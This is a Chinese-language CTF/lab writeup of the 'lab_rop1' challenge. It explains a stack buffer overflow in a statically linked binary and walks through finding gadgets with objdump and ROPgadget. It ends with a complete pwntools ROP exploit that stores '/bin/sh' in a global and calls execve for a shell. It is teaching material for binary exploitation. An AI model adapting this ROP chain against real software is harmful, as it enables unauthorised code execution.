LYS Rop lab_rop1 Writeup

kazma Security Researcher
  2023-12-12 22:54:46 2023-12-12 22:54:46 Created   2025-08-20 13:53:24 2025-08-20 13:53:24 Updated    

lab_rop1

執行看一下:

preview

file 看一下:

stalink

r2 看一下 main:

r2

OK,首先他把第一個輸入讀到全域變數 obj.name,然後開了一個 0x10 的 buffer 但是讀了 0x100 個 bytes。
那我們的計畫就是把 “/bin/sh\0” 先放到 obj.name,然後正常 rop 就行,值得注意的是因為是 statically linked,所以基本上 gadget 蠻好找的。
至於 obj.name 的位置怎麼找有蠻多方式的,r2 很貼心的把位址寫在 obj.name 上面,也可以直接開 ida 看,或是用 objdump 也行,這裡再示範一下 objdump 的找法:

1
objdump -M intel -d rop1 | less

objname
gadget 找法:

1
ROPgadget --binary ./rop --only "pop|ret" | less

exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

context = 'amd64'
r = process("./rop1")

pop_rax = 0x000000000044fd87
pop_rdi = 0x0000000000401f4f
pop_rdx_rbx = 0x0000000000485bab
pop_rsi = 0x0000000000409f7e
syscall = 0x0000000000401d04
address = 0x4c7300
r.sendlineafter(b'name? ', b'/bin/sh')

p = b'a'*0x18
p += p64(pop_rdi) + p64(address)
p += p64(pop_rdx_rbx) + p64(0x0) + p64(0x0)
p += p64(pop_rsi) + p64(0x0)
p += p64(pop_rax) + p64(0x3b)
p += p64(syscall)

r.sendlineafter(b'vuln: ', p)
r.interactive()

pwned

Pwned !!!

  • Title: LYS Rop lab_rop1 Writeup
  • Author: kazma
  • Created at : 2023-12-12 22:54:46
  • Updated at : 2025-08-20 13:53:24
  • Link: https://kazma.tw/2023/12/12/LYS-Rop-lab-rop1-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
LYS Rop lab_rop1 Writeup
  1. lab_rop1